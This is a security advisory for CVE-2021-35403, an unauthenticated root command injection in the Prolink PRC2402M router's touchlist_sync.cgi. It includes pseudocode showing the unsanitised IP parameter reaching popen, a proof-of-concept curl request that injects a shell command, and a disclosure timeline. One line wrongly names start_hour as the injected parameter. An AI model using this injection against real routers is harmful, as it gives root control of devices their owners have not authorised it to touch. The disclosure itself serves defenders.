CVE: CVE-2021-35403

Tested Versions:

  • Prolink PRC2402M 20190909

Product URL(s):

Description of the vulnerability

This vulnerability is present as there are no checks on user input taken by touchlist_sync.cgi, which is passed to popen, allowing an attacker to execute arbitrary code in the context of the root user on affected installations of the Prolink PRC2402M router.

No authentication is required to exploit this vulnerability.

The router makes GET requests to interact with the cgi scripts. To access the vulnerable script, visit http://localhost/cgi-bin/touchlist_sync.cgi.

As seen in the simplified pseudocode of main below, the following conditions are checked:

  • the getACL parameter is not equal to "1"
  • the MeshMode nvram value is equal to "1" or "2"

If both conditions are satisfied, the IP parameter is passed to do_system without any input validation, allowing an attacker to supply malicious input and gain arbitrary code execution.

void main(char* querystring)
{
    querystring = getenv("QUERY_STRING");
    getACL = web_get("getACL",querystring,0);
    if (strcmp(getACL,"1") == 0) {
        ...
        return;
    }
    ...
    IP = web_get("IP",querystring,0);
    ...
    MeshMode = nvram_bufget(0, "MeshMode");
    if (strcmp(MeshMode, "1") == 0) {
        sprintf(command,"curl -s -m 5 http://%s/cgi-bin/touchlist_sync.cgi?getACL=1", IP);
        ...
        popen(command,"r");
        ...
    }
    else if (strcmp(MeshMode, "2") == 0) {
        sprintf(command,"curl -s -m 5 http://%s/cgi-bin/touchlist_sync.cgi?getACL=1", IP);
        ...
        popen(command,"r");
        ...
    }
}

Exploit

To exploit this vulnerability, perform a GET request to touchlist_sync.cgi with the start_hour parameter containing the target command to execute.

For example,

curl 'http://localhost/cgi-bin/touchlist_sync.cgi?getACL=0&IP=$(echo%20gg%3E/tmp/gg)%23'

(Note that proper URL encoding should be applied on the querystring parameters for the server to handle the request.)

Timeline

  • 2021-06-10 Reported to Vendor, Prolink
  • 2021-06-10 Prolink acknowledged report
  • 2021-06-10 Prolink claimed to have patched it
  • 2021-06-11 Team member Daniel Lim sent in his bypass for their patch
  • 2021-06-11 Prolink acknowledged the new bypass
  • 2021-06-13 Prolink fixed it